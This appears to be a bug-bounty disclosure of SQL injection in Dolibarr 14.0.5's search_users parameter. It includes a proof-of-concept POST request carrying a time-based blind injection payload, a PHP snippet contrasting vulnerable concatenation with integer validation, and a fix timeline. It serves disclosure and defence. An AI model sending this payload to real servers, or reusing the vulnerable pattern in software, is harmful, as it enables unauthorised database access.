SQL Injection in dolibarr/dolibarr

Valid

Reported on

Jan 9th 2022


Description

The search_users parameter is not sanitised or escaped before it is used in a SQL statement, which could lead to SQL injection.

Proof of Concept

Slow query example:

POST /dolibarr-14.0.5/htdocs/compta/sociales/list.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://dolibarr.host.com/dolibarr-14.0.5/htdocs/
Cookie: DOLSESSID_fccaaf42bd9fa1c7b06bdc9c436940dd=mo7pn9rar97v28ol5a34qe0oa0; 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 478
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36
Host: dolibarr.host.com
Connection: Keep-alive

action=list&button_search_x=x&contextpage=sclist&formfilteraction=list&limit=1&pageplusoneold=1&search_amount=the&search_label=the&search_month_lim=7&search_project_ref=the&search_ref=&search_status=the&search_users[]=(select(0)from(select(sleep(0)))a)&search_year_lim=2027&selectedfields=cs.rowid%2Ccs.libelle%2Ccs.fk_type%2Ccs.date_ech%2Ccs.periode%2Cp.ref%2Ccs.fk_user%2Ccs.amount%2Ccs.paye%2C&sortfield=cs.date_ech&sortorder=DESC&token=7911ea6a297ad0d6edb116a22fe7e35ee7e35e
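To illustrate the flaw described above, here is an added example (not code from the report or from Dolibarr) of an array filter such as search_users[] being concatenated into an IN (...) list, next to a hardened version. It assumes the filter targets the integer column cs.fk_user seen in the request's selectedfields, and the first array element is constructed to mirror the report's PoC payload.

```php
<?php
// Added example, not Dolibarr's code. Constructed input that mirrors the
// search_users[] values from the PoC request above (assumption: the values
// arrive as an array of strings from the POST body).
$search_users = ['(select(0)from(select(sleep(0)))a)', '12'];

// Vulnerable pattern: each value is pasted into the IN (...) list verbatim,
// so a subquery supplied by the client reaches the database unchanged.
function build_where_vulnerable(array $users): string
{
    return " AND cs.fk_user IN (" . implode(',', $users) . ")";
}

// Hardened pattern: cs.fk_user is an integer foreign key, so every element
// is validated as an integer and anything that is not a positive id is
// dropped. Only digits can ever reach the SQL string.
function build_where_hardened(array $users): string
{
    $ids = [];
    foreach ($users as $u) {
        $id = filter_var($u, FILTER_VALIDATE_INT);
        if ($id !== false && $id > 0) {
            $ids[] = $id;
        }
    }
    if (empty($ids)) {
        return '';   // no valid ids: emit no filter rather than IN ()
    }
    return " AND cs.fk_user IN (" . implode(',', $ids) . ")";
}

// The first call shows the subquery surviving into the WHERE clause; the
// second keeps only the numeric id.
echo build_where_vulnerable($search_users), "\n";
echo build_where_hardened($search_users), "\n";
```

For filters on string columns, where an integer cast is not possible, the same principle applies through bound parameters or the database layer's escaping function rather than direct concatenation.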

Impact

A successful attack may result in the deletion of entire tables and, in certain cases, in the attacker gaining administrative rights to the database, writing files to the server (leading to remote code execution), or writing scripts to extract data.

We are processing your report and will contact the dolibarr team within 24 hours. 19 days ago
We have contacted a member of the dolibarr team and are waiting to hear back 18 days ago
We have sent a follow up to the dolibarr team. We will try again in 7 days. 15 days ago
Laurent Destailleur validated this vulnerability 15 days ago
laladee has been awarded the disclosure bounty
The fix bounty is now up for grabs
Laurent Destailleur confirmed that a fix has been merged on b9b45f 15 days ago
Laurent Destailleur has been awarded the fix bounty